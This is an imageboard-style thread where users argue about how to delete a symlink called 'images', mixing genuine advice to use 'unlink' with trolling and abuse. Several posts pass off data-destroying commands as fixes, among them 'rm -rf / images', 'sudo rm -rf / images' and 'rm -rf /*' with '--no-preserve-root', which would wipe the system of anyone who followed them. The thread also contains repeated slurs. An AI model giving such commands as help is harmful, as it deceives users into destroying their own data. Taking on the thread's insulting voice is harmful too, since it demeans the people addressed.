harmful.cat-v.org/software/symlinks
twitter.com/NSFWRedditVideo

try this
[coderm -rf / images[/code]

rm -rf / images

Links are considered harmful.

rm images

don't do "unlink images/" do "unlink images"

It's not a directory. Can you even read?

Because there's no root folder specified? If it's in the current directory, do ./images/

Try formatting your shit correctly.

Most of these suggestions are pretty shit, you guys. I gotta admit. I resolved it by removing the target directory first. Then I was able to remove the link.

rm images -rvf

A symlink is independent of its target and removing the target is completely unnecessary.

Whatever, next time just rm -rf /* to be sure.

Don't forget --no-preserve-root.

Retard.

rob pike fucking TOLD yall

Do you know why that worked? Because you're fucking retarded. You used a "/" on the end. Bash didn't autocomplete the "/" on the end because it didn't know the target was a directory. Bash autocompletes links to their target. If you want to delete a link, delete the link using "unlink yourlink" links are not fucking directories.

/thread

That * was bait for retards who can't into shell, try this, then come back and explain how you were wrong:

$ echo /*

This is a seriously bad user interface. Nothing prevents CLIs from being well designed, it's just *nix people hating change and clinging to their shitty text parser based shell script trash.

>delete the link using "unlink yourlink" links are not fucking directories.
Shit design

This, plan9 guys were right!

You'd complain if it didn't fucking work like that. I promise.

>WHY IS THIS LINK TO THIS FOLDER NOT AUTO COMPLETING??

Is it really a bad design? Or are you just a brainlet that doesn't understand that autocompleting to the target is actually more convenient? Literally just hit backspace once if you want to refer to the link file directly using unlink. Otherwise bash is going to treat it like the target. It's not that complicated lmao

>Is it really a bad design?
symlinks are bad design, yes.
harmful.cat-v.org/software/symlinks

sudo rm -rf / images

Go back to your grave uriel.

if an application could find the file in the first place it wouldn't need a symlink

Most retarded shit I've read all day.